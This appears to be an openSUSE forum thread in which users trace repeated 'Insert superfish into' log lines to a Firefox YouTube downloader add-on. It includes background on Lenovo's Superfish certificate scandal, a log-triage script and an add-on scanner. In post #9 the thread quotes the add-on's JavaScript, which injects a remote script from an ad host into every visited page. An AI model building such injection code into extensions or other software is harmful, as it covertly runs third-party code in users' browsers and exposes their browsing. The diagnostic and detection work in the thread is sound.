
Thread: Mozilla Adware Superfish

  1. #1
    Join Date
    Jun 2008
    Location
    Rural Australia
    Posts
    289

    Default Mozilla Adware Superfish

    One of my users is causing logs to fill constantly with repeating lines. Seeking why, I found superfish mentioned here:

    https://forums.opensuse.org/showthread.php/505448-Lenovo-PCs-ship-with-extremely-dangerous-man-in-the-middle-adware-(-Windows-)?p=2696912#post2696912

    with links to further info :

    http://www.pcworld.com/article/28873...ish-snafu.html

    with comment:
    A proposed class-action suit was filed late last week against Lenovo and Superfish, which charges both companies with “fraudulent” business practices and of making Lenovo PCs vulnerable to malware and malicious attacks by pre-loading the adware.

    Plaintiff Jessica Bennett said her laptop was damaged as a result of Superfish, which was called “spyware” in court documents. She also accused Lenovo and Superfish of invading her privacy and making money by studying her Internet browsing habits.

    https://blog.hboeck.de/archives/865-...Superfish.html

    with comment:
    There is a software called Privdog. It totally breaks HTTPS security in a similar way as Superfish.
    providing reference to article: https://m.facebook.com/notes/protect...70074729899339

    where it is written:
    Superfish uses a third party library from a company named Komodia to modify the Windows networking stack and install a new root Certificate Authority (CA), allowing Superfish to impersonate any SSL-enabled site. The new root CA undermines the security of web browsers and operating systems, putting people at greater risk. The stated reason for this inspection functionality is to enable the Superfish Visual Search capability that looks at people's search queries and makes suggestions based on proprietary processes.

    more worrying:
    the Superfish software can see all of the computer user's activity, including banking, email and Facebook traffic. The second problem is the use and installation of a new root CA,


    Code:
    Aug 04 08:09:24 linux-52pn firefox.desktop[13318]: Insert superfish into: about:preferences
    Aug 04 08:09:25 linux-52pn firefox.desktop[13318]: Insert superfish into: about:blank
    Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:addons
    Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
    Aug 04 08:09:50 linux-52pn firefox.desktop[13318]: Insert superfish into: https://services.addons.mozilla.org/en-US/firefox/discovery/pane/38.0.1/Linux/normal#{%22{972ce4c6-7e08-4474-a285-3208198ce6fd}%22:{%22name%22:%22Default%22,%22version%22:%2238.0.1%22,%22type%22:%22theme%22,%22userDisabled%22:true,%22isCompatible%22:true,%22isBlocklisted%22:false},%22susefox@opensuse.org%22:{%22name%22:%22openSUSE%20Firefox%20Extensions%22,%22version%22:%221.0.2%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-OoNOA6XBjznvLQ@jetpack%22:{%22name%22:%22GNotifier%22,%22version%22:%221.8.5%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-KWFaW5zc0EbtBQ@jetpack%22:{%22name%22:%22YouTube%20Video%20Downloader%20-%20For%20Context%20Menu%22,%22version%22:%220.1.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22info@youtube-mp3.org%22:{%22name%22:%22YouTube%20mp3%22,%22version%22:%221.0.9.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22paulsaintuzb@gmail.com%22:{%22name%22:%22Youtube%20Downloader%20-%204K%20Download%22,%22version%22:%225.7.4.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22captiondownloader@hiephm.com%22:{%22name%22:%22YouTube%20Caption%20Downloader%22,%22version%22:%222.3.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22626160@personas.mozilla.org%22:{%22name%22:%22Cola%22,%22version%22:%220%22,%22type%22:%22theme%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22gmp-gmpopenh264%22:{%22name%22:%22OpenH264%20Video%20Codec%20provided%20by%20Cisco%20Systems,%20Inc.%22,%22version%22:%221.4%22,%22type%22:%22plugin%22,%22userDisabled%22:fals
e,%22isCompatible%22:true,%22isBlocklisted%22:false},%22{0ac05972-878a-da26-5064-b268835efaa5}%22:{%22n
    Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update

    The app seems to insert itself into pages opened by the browser:

    Code:
    Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
    Aug 04 08:11:46 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
    Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/?q=current%20version%20plugin%20Native%20Client
    Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/post2.html
    Aug 04 08:12:31 linux-52pn firefox.desktop[13318]: Insert superfish into: https://en.wikipedia.org/wiki/Google_Native_Client
    Aug 04 08:13:35 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
    Aug 04 08:13:41 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com

    For now, superfish appears to have been removed along with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
    The App: https://addons.mozilla.org/en-US/fir...ia-downloader/
    Version 5.7.4.1-signed Info
    April 23, 2015
    Released under Mozilla Public License, version 2.0



    How to prevent it being re-installed ?
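
Added example (not part of the original post): one way to triage journal output like the above, assuming the syslog-style prefix shown in the post. It re-joins entries that wrapped onto a second line, then counts injections per target and how many landed on HTTPS pages; the sample lines, host names and PID are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Syslog-style prefix as in the post: "Aug 04 08:09:24 host unit[pid]: message"
PREFIX = re.compile(r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ \S+?\[(\d+)\]: (.*)$")
MARKER = "Insert superfish into: "

# Constructed sample in the post's format; host names and PID are placeholders.
# The third line is the tail of a wrapped entry, as seen in the post.
SAMPLE_LOG = """\
Aug 04 08:09:24 host1 firefox.desktop[4242]: Insert superfish into: about:newtab
Aug 04 08:09:50 host1 firefox.desktop[4242]: Insert superfish into: https://addons.example.test/pane#%22userDisabled%22:fals
e,%22isCompatible%22:true
Aug 04 08:10:01 host1 systemd[1]: Started Session 3 of user demo.
Aug 04 08:12:12 host1 firefox.desktop[4242]: Insert superfish into: https://search.example.test/?q=demo
Aug 04 08:12:31 host1 firefox.desktop[4242]: Insert superfish into: http://search.example.test/post2.html
"""

def parse_injections(text):
    """Return [timestamp, pid, url] per marker entry, re-joining wrapped lines."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PREFIX.match(line)
        if m:
            ts, pid, msg = m.groups()
            current = None  # an unrelated entry ends any wrapped URL
            if msg.startswith(MARKER):
                current = [ts, int(pid), msg[len(MARKER):]]
                records.append(current)
        elif line and current is not None:
            current[2] += line  # continuation of a wrapped URL
    return records

def summarize(records):
    """Count injections per target and how many hit HTTPS pages."""
    targets, https_hits = Counter(), 0
    for _ts, _pid, url in records:
        parts = urlsplit(url)
        web = parts.scheme in ("http", "https")
        targets[parts.hostname if web else parts.scheme + ":"] += 1
        https_hits += parts.scheme == "https"
    return targets, https_hits

if __name__ == "__main__":
    print(summarize(parse_injections(SAMPLE_LOG)))
```

The PID in each record identifies the Firefox process, which helps tie the entries to one user's session.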

  2. #2
    Join Date
    Jun 2008
    Location
    Netherlands
    Posts
    25,158

    Default Re: Mozilla Adware Superfish

    And on which version of openSUSE are you seeing this?
    Henk van Velden

  3. #3
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 06:56, paulparker wrote:
    >
    > One of my users causing logs to fill constantly with repeating lines
    > seeking why, found *superfish* mentioned here :


    And what openSUSE version is that user with problems using? And what
    Firefox? I tried searching for a superfish plugin or addon, and I didn't
    find any.

    --
    Cheers / Saludos,

    Carlos E. R.

    (from 13.1 x86_64 "Bottle" (Minas Tirith))

  4. #4
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    this is a strange thread, afaik there is no superfish for linux, it seems the addon you got scans web pages to detect embedded videos, that's what you wanted isn't it, as google goes out of its way to prevent grabbing youtube content, mozilla usually scans addons for malware but anything is possible, I can tell you what I use to grab videos.
    For youtube only
    https://addons.mozilla.org/en-us/fir...nload-youtube/
    for most other sites including youtube I use flashgot (it has a media detector)
    https://addons.mozilla.org/en-us/fir...ddon/flashgot/
    none of these work with mms, but that's a different issue.

    ps the above addons are both open source and if you try looking for it you can find it, I do believe they're clean.

  5. #5
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    For now appears superfish removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
    The App: https://addons.mozilla.org/en-US/fir...ia-downloader/
    Version 5.7.4.1-signed Info
    April 23, 2015
    Released under Mozilla Public License, version 2.0
    I checked that plugin (https://addons.mozilla.org/en-US/fir...ia-downloader/ ) and it's clean, the reason it's so big (10.2MiB) is it carries binary copies of ffmpeg for 2 platforms (Win and OS-X).
    I'm re-reading your post and can't make heads or tails of it.
    superfish is a windows binary it can do nothing under Linux, did you maybe use mozilla sync and import something from Windows, even with sync Firefox only syncs addons from its site and a win dll on its own running under a regular user account can do very little under Linux, worst case scenario delete your ~/.mozilla folder and create a new clean profile.

  6. #6
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    browsing the content of
    https://addons.mozilla.org/firefox/d...252-latest.xpi
    I see a file called
    superfish.js
    from the content of that file I'm thinking it could be an ad injector although it could be malware it has nothing to do with Lenovo's man in the middle attack, the js code is there (in the link and in the xpi) you can check it out, I'm surprised mozilla hasn't removed this add-on, maybe injecting ads isn't thought of as a bad thing as every toolbar does it?
    In short you weren't a victim of Lenovo's man in the middle blunder, you were a victim of an ad injector, that add-on is bad there are better ones (see the ones I mentioned a few posts above), being MPL this proves that even open source projects can make bad choices (mediainfo includes adware in its windows binaries) unfortunately it's the way the internet works (on ads), I would say get yourself an ad blocker but that's your choice.

  7. #7
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 22:06, I A wrote:

    > I'm re-reading your post and can't make heads or tails of it.
    > superfish is a windows binary it can do nothing under Linux, did you
    > maybe use mozilla sync and import something from Windows, even with sync


    I'm now guessing that he is admin for a network, and one of the users
    there, using a Windows machine, has that thing. And he wants to block it
    externally, perhaps in the firewall. Or something of the sort.

    I don't think that's possible. That malware inserts or replaces a master
    root certificate, on the system. Any false site those people want to,
    will be certified to be the proper web page for your bank, when it is
    instead a mafia site — but the browser will say it is the correct site.
    You can do nothing externally to avoid this situation.

    What I would do, perhaps, is install Windows Server in a machine, create
    a domain, then force all machines to only log in that Windows Domain
    (AD), and then impose my own rules. AD allows very fine controls on
    programs and users. Specifically, you can deny them the right to install
    software.

    I don't know if this is doable via samba 4 and ldap. They are trying.

    If AD is not an option, then I would give users only users accounts, not
    privileged accounts. Anybody that complains and fights, fired. >:-)

    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)

  8. #8
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 22:26, I A wrote:
    >
    > browsing the content of
    > http://tinyurl.com/od4l52s


    Code:
    https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi
    What's the name of that addon? :-?


    > In short you weren't a victim of Lenovo's man in the middle blunder, you
    > were a victim of an ad injector, that add-on is bad there are better
    > ones (see the ones I mentioned a few posts above), being MPL this
    > proves that even open source projects can make bad choices (mediainfo
    > includes adware in its windows binaries) unfortunately it's the way the
    > internet works (on ads), I would say get yourself an ad blocker but
    > that's your choice.


    wow :-o

    Maybe that addon could be reported to mozilla people. :-?


    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)

  9. #9
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    Quote Originally Posted by robin_listas View Post
    On 2015-08-04 22:26, I A wrote:
    >
    > browsing the content of
    > http://tinyurl.com/od4l52s


    Code:
    https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi
    What's the name of that addon? :-?


    > In short you weren't a victim of Lenovo's man in the middle blunder, you
    > were a victim of an ad injector, that add-on is bad there are better
    > ones (see the ones I mentioned a few posts above), being MPL this
    > proves that even open source projects can make bad choices (mediainfo
    > includes adware in its windows binaries) unfortunately it's the way the
    > internet works (on ads), I would say get yourself an ad blocker but
    > that's your choice.


    wow :-o

    Maybe that addon could be reported to mozilla people. :-?


    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)
    the name of the addon is
    Youtube Downloader 4K - Video Downloader
    the problem with it is this part
    Code:
    //var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
    var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
    // Use the same scheme as the page currently being viewed
    if( document.location.href.indexOf("https:") === 0 ){
        injectUrl = "https://" + injectUrl;
    }
    else{
        injectUrl = "http://" + injectUrl;
    }
    // Load the remote script into the current page
    var script = document.createElement("script");
    script.setAttribute( "src", injectUrl );
    document.head.appendChild( script );
    // The two braces below close enclosing blocks that are not part of this excerpt
    }
    }
    re-reading the content of the js it does seem to be connected with www.superfish.com and those are the same people that did the MiM deal with Lenovo, but as far as I can tell this addon, injects ads on certain sites it does not do a classic MiM attack

    edit.
    I was just at mozilla's site (as a logged in user) and there doesn't seem to be a way to report "bad addons", the only thing you could do is write a bad review. That's disappointing seeing how mozilla plans on blocking all addons that do not come from addons.mozilla.org and don't have a signature
    https://threatpost.com/mozilla-to-en...tensions-soon/
    this proves that even signed and checked addons are not safe.
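
Added example (not from the thread or the add-on): a static check an administrator could run over downloaded XPI files to flag JavaScript that builds a script element and points it at a host, as the quoted snippet does. The regular expressions are heuristics chosen here, and the sample archive, file names and hosts are constructed placeholders.

```python
import io
import re
import zipfile

# Pattern from the quoted snippet: create <script>, set its src, append it.
CREATE_SCRIPT = re.compile(r"""createElement\(\s*["']script["']\s*\)""")
SET_SRC = re.compile(r"""setAttribute\(\s*["']src["']|\.src\s*=""")
APPEND = re.compile(r"\.appendChild\(")
# host/path literal; scheme optional (the quoted code prepends it at run time).
HOST_LITERAL = re.compile(
    r"""["'](?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})/[^"']*["']""", re.I)

def remote_script_hosts(js_source):
    """Hosts a file may inject a script from ([] if no pattern); // lines skipped."""
    live = "\n".join(line for line in js_source.splitlines()
                     if not line.lstrip().startswith("//"))
    if not (CREATE_SCRIPT.search(live) and SET_SRC.search(live)
            and APPEND.search(live)):
        return []
    return sorted({h.lower() for h in HOST_LITERAL.findall(live)})

def scan_xpi(xpi_bytes):
    """Map each .js member of an XPI (a zip archive) to its suspicious hosts."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as xpi:
        for name in xpi.namelist():
            if name.lower().endswith(".js"):
                text = xpi.read(name).decode("utf-8", errors="replace")
                hosts = remote_script_hosts(text)
                if hosts:
                    findings[name] = hosts
    return findings

def build_sample_xpi():
    """Constructed archive; file names and hosts are placeholders."""
    inject = ('// var u = "old.example.test/ws/main.jsp";\n'
              'var u = "ads.example.test/ws/main.jsp?src=demo";\n'
              'var s = document.createElement("script");\n'
              's.setAttribute("src", "https://" + u);\n'
              'document.head.appendChild(s);\n')
    benign = 'document.body.appendChild(document.createElement("div"));\n'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("content/inject.js", inject)
        z.writestr("content/ui.js", benign)
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_xpi(build_sample_xpi()))
```

A hit is a prompt for manual review of the file, not proof of adware; legitimate add-ons also load scripts, and obfuscated code will not match.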

  10. #10
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 23:06, I A wrote:

    > the name of the addon is
    > Youtube Downloader 4K - Video Downloader


    Huh. I have:

    "Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed", by
    pos1t1ve. Homepage is http://www.flashvideodownloader.org/

    Is it the same? :-?

    > the problem with it is this part

    ....

    > re-reading the content of the js it does seem to be connected with
    > www.superfish.com and those are the same people that did the MiM deal
    > with Lenovo, but as far as I can tell this addon, injects ads on
    > certain sites it does not do a classic MiM attack


    Huh.

    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)
